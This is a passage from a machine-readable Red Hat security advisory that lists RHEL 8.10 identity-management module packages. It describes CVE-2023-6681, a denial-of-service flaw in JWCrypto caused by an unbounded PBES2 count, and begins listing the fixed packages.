"product_reference": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client"
},
"product_reference": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client"
},
"product_reference": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client"
},
"product_reference": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client"
},
"product_reference": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client"
},
"product_reference": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-6681",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-01-29T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2260843"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in JWCrypto. This flaw allows an attacker to cause a denial of service (DoS) attack and possible password brute-force and dictionary attacks to be more resource-intensive. This issue can result in a large amount of computational consumption, causing a denial of service attack.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "JWCrypto: denail of service Via specifically crafted JWE",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The identified vulnerability within the jwcrypto package, presents a moderate severity concern rather than a important one due to several mitigating factors. While the unbounded PBES2 Count value in PBKDF2 algorithms can potentially facilitate a Denial of Service (DoS) attack, its severity is tempered by the fact that successful exploitation requires specific conditions and considerable computational resources. Additionally, applications not reliant on PBKDF2 can easily exclude it from their algorithms list, further reducing exposure.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
